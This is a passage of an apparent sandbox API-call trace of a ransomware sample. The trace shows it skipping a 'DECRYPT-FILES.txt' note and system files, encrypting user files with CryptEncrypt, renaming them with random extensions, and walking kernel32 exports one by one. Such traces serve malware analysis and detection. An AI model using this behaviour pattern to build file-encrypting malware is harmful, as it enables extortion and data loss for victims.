[0077.270] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.270] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.270] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.270] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.270] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.270] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.270] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.270] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.270] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.270] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.270] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.271] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a") returned 64 [0077.271] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a.Dsca3KU") returned 72 [0077.271] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l0rhght3efgshf.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a.Dsca3KU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l0rhght3efgshf.m4a.dsca3ku"), dwFlags=0x0) returned 1 [0077.271] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.271] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.272] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.272] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9eabce30, ftCreationTime.dwHighDateTime=0x1d4c877, ftLastAccessTime.dwLowDateTime=0xb8df5a90, ftLastAccessTime.dwHighDateTime=0x1d4cecd, ftLastWriteTime.dwLowDateTime=0xb8df5a90, ftLastWriteTime.dwHighDateTime=0x1d4cecd, nFileSizeHigh=0x0, nFileSizeLow=0x13e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="lxivA.wav", cAlternateFileName="")) returned 1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="autorun.inf") returned 1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="boot.ini") returned 1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="desktop.ini") returned 1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="ntuser.dat") returned -1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="iconcache.db") returned 1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="bootsect.bak") returned 1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="ntuser.dat.log") returned -1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="thumbs.db") returned -1 [0077.272] lstrcmpiW (lpString1="lxivA.wav", lpString2="Bootfont.bin") returned 1 [0077.272] lstrlenW (lpString="lxivA.wav") returned 9 [0077.272] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0077.272] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0077.272] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0077.272] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0077.272] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.272] lstrlenW (lpString="lxivA.wav") returned 9 [0077.272] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.272] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="lxivA.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav" [0077.272] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lxiva.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.273] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=5089) returned 1 [0077.273] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.273] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.273] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.273] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.273] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.274] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.274] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.274] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.274] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.275] CloseHandle (hObject=0x444) returned 1 [0077.275] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.275] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.275] CloseHandle (hObject=0x0) returned 0 [0077.275] CloseHandle (hObject=0x440) returned 1 [0077.276] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.276] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.277] GetTickCount () returned 0x114bd38 [0077.277] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.277] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.277] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.277] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.277] lstrlenA (lpString="kernel32.dll") returned 12 [0077.277] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.278] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.278] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.278] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.278] lstrlenA (lpString="ADDATOMA") returned 8 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.278] lstrlenA (lpString="ADDATOMW") returned 8 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.278] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.278] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.278] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.278] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.278] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.278] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.278] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.278] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.278] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.278] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.278] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.278] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.278] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.278] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.279] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.279] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.279] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.279] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.279] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.279] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.279] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.279] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.279] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.279] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.279] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.279] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.279] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.279] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.279] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.279] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.279] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.279] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.280] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.280] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.280] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.280] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.280] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.280] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.280] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.280] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.280] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.280] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.280] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.280] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.280] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.280] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.280] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.280] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.280] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.280] lstrlenA (lpString="BEEP") returned 4 [0077.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.281] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.281] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.281] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.281] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.281] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.281] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.281] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.281] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.281] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.281] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.281] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.281] lstrlenA (lpString="CANCELIO") returned 8 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.281] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.281] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.281] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.281] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.281] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.281] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.282] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.282] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.282] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.282] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.282] lstrcpyA (in: lpString1=0x3f2d1ec, 